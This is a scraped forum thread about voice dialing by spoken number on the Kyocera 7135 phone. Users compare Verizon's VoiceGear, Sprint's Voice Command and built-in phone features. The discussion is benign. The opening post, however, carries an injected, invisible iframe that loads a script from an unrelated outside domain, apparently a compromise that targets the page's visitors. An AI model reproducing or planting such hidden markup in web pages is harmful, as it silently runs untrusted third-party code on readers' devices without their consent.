+ Reply to Thread
Page 1 of 2 1 2 LastLast

Voice Dialing by Number

Does anyone know if there is any software out there that will allow you to voice dial by number (instead of by name). It would be really great to use "wake up" and then tell it a number to dial and have it dialed.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The only way I'm aware of to do this is using Voicegear with Verizon. Costs $5/ month. I've been using it for the past couple months, and find it's worth it. You can upload your entire outlook contact list to the system, then voicegear can recognize all those names, as well as just recognizing speaking a phone number. It is, however, significantly slower than just using names in the 7135 phone itself. You need to call into voicegear (which takes a few seconds to connect), then say "call someone", wait about 5 seconds, then say "call John Smith" or "call 222-555-1111"

Thanks, I may try it out. I do find it strange why this capability was not built into the 7135. After all, if you can train it to recognize words, why not be able to train it to recognize numbers?

I used the Sprint equivalent of Voice Gear, called Voice Command. From the pamphlet they gave me at the Verizon store, VG looks a little less streamlined, but just as useful. I swore by Voice command; never even used the 6035's built in voicedialing because voice command let me just say the numbers to dial. Of course, if they'd put that capability into the phone, that would be a killer app, but I suspect it would take up a lot of space. I would highly recommend these services. With a handsfree kit and VG or VC, dialing a number in the car isn't any harder than changing the station on your radio.
    ---------------
    The same thing we do every night, Pinky...

I suppose when you record the tags for the Voice dialing on the 7135, you could just say the person's number instead of their name. But what's the point really? That way you need to memorize everyone's number rather than just simply knowing the name of the person you want to call.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    I suppose when you record the tags for the Voice dialing on the 7135, you could just say the person's number instead of their name. But what's the point really? That way you need to memorize everyone's number rather than just simply knowing the name of the person you want to call.
    That's not what I'm getting at. I like the dialing by name. Voice dialing is limited to 30 names. Consequently, if a name has not been entered into voice dialing or isn't in my address book, it would be great to just be able to say "dial xxx-xxx-xxxx."

I see.
    ~'kito
    pdaPhoneHome Moderator

Administrator
    well that wont work on the 7135 , so it seems you may need to subscribe to the verizon feature...

Originally posted by marctronixx
    well that wont work on the 7135 , so it seems you may need to subscribe to the verizon feature...
    Any rumors of it being a software upgrade (or would it take up too much memory)?

I never knew about Voice Gear, that's a great feature. I just signed up. Regarding if it will make it to the 7135, I doubt it.

Speech apps like this take a huge amount of RAM. We sell them to businesses, and a basic unit for 300 users takes 1GB of RAM.

Voice Dialing

The Pocket PC phones have this capability. Especially the Siemens XC56. No need to train. Since this phone does not have 1GB of RAM, I think it can be done.

My old QCP-860 was also able to do this when plugged into the Car Kit.

asmoore,

Are you sure about the capabilities of the QCP-860 and the Pocket PC phones?

I was intrigued by your post so I checked the specs on the QCP-860 and it only holds 99 numbers. I'm not sure how it would recognize a large list of numbers (in my case 1200). Voice Gear allows you to upload up to 2000 names with up to three numbers each.

I downloaded the manual for the Siemens SX56 and don't see anything about voice dialing.

Not that I'm doubting you, but I haven't see any other cell phone do what Voice Gear does. The feature in the 7135 is pretty good, but of course limited to 30 entries and it's a pain to set up.

I think it is kinda fun to set up. But then I must admit that I actually enjoy data entry. It comes with being a geek.
    ~'kito
    pdaPhoneHome Moderator

Markito

I enjoy data entry and tweaking as much as the next person, but it was neat to spend ten minutes and get all my contacts up on the Verizon website and be able to dial them effortlessly.

This isn't a Verizon plug for the service, but it does work well. I have never even heard of Voice Gear until I read in this post yesterday. Funny they don't advertise it.

QCP-860 & Car Kit

The phone itself does not have this capability, however when you plug it into the Car Kit, it can. In the car kit, you say Wake Up, twice. It says "Speak a name", you eith say a programmed name or NUMBER. If a programmed name, voila. If a number, just say 2225551212 CALL, and it goes. This did require voice training, like the 6035/7135. But did work. You did have to voice train "wake up", "call", "yes", "no", 1, 2, 3, 4, 5, 6, 7, 8, 9 and 0.

Also on the Siemens, I saw and held the phone and dialed a number, that I had not programmed in by voice.

asmoore - Thanks for the info. Strange that Kyo didn't put the number dialing feature in the 6035 and 7135, I would have used that.

The Verizon app that we have discussed is quite a bit different that the two you described. Gives you gobs of capacity and it works pretty well. I have found that it works better than the on-board voice app on the 7135. I find myself having to repeat the name on the Kyo, even though I have recorded the name under same conditions (headset, etc.). Voice Gear has been 98% accurate so far, as long as you're not using speakerphone.

I tried timing, it appears to add 15 seconds to the beginning of the call by the time you call, tell it you want to call someone, wait for the next "bong" and tell it to dial a name, but you can't beat that while driving.

I can't see myself using it if I wasn't driving, dialing via contacts in the 7135 would be easier and more up to date as my contacts are always changing.

Verizon lets you update names and numbers via voice or web, but hopefully there is a way just to upload your contacts once a month or something to make sure the latest was up there. Anybody done that?

I-300 Novice
    I have been following all of your posts on VoiceGear with amazement.

I switched to Sprint a number of years ago solely for their Voice Command and being able to upload my contact list and be able to access the numbers while I am driving. I regretted losing the no answer/busy call forwarding with Verizon. At the ime I switched, Sprint offered no comparable service.

I switched to Verizon and a Kyocera 7135 a month or so ago only because I was tired of the Samsung I-300 miserable battery life and not having a real keypad for the phone. The 7135 was not my preference; if both were available, I would prefer the Samsung I-500 purely because of the size of the keys in the keypad.

The fact that Verizon has come out with the Voice Gear program and I can now have no answer/busy call forwarding again is going to make the decision as to whether or not I should switch to the I-500 (and back to Sprint) for the key size very difficult!

Sometimes, ignorance truly is bliss!
    Ahmed V. Ismail
    A Smartphone Addict

Yup- as posted earlier, VG does work well, and I use it a fair amount while driving. I also had been using Sprint recently (just while waiting for the 7135), and their voice recognition if much better in one way- not requiring "Call Someone" before actually saying "Call John Smith". Thus, it was much faster. I emailed verizon about this a couple months ago, but maybe if they hear from others they might "fix" this. I'm sure they do it because the system also works to get weather, news, etc, etc (for another $5/mo), but I'm sure the majority would just like a quicker voice recog system for dialing. One major benefit of VG over Sprint is unlimited contacts, where Sprint allowed only 500 contacts max to be uploaded....

Originally posted by Teledatageek
    Voice Gear has been 98% accurate so far, as long as you're not using speakerphone.
    I assume that you mean the 7135's built in speakerphone as I would expect that you be using the hands free kit speakerphone.

I was referring to the built-in speakerphone on the 7135. I was trying to demo the feature to others via the speakerphone, not so good.

pdadoc - Not unlimited contacts, they do max it out at 2000. Plenty more than I have though. I agree they should kill the two step process to make a call, of course more air time for Verizon the way it is now.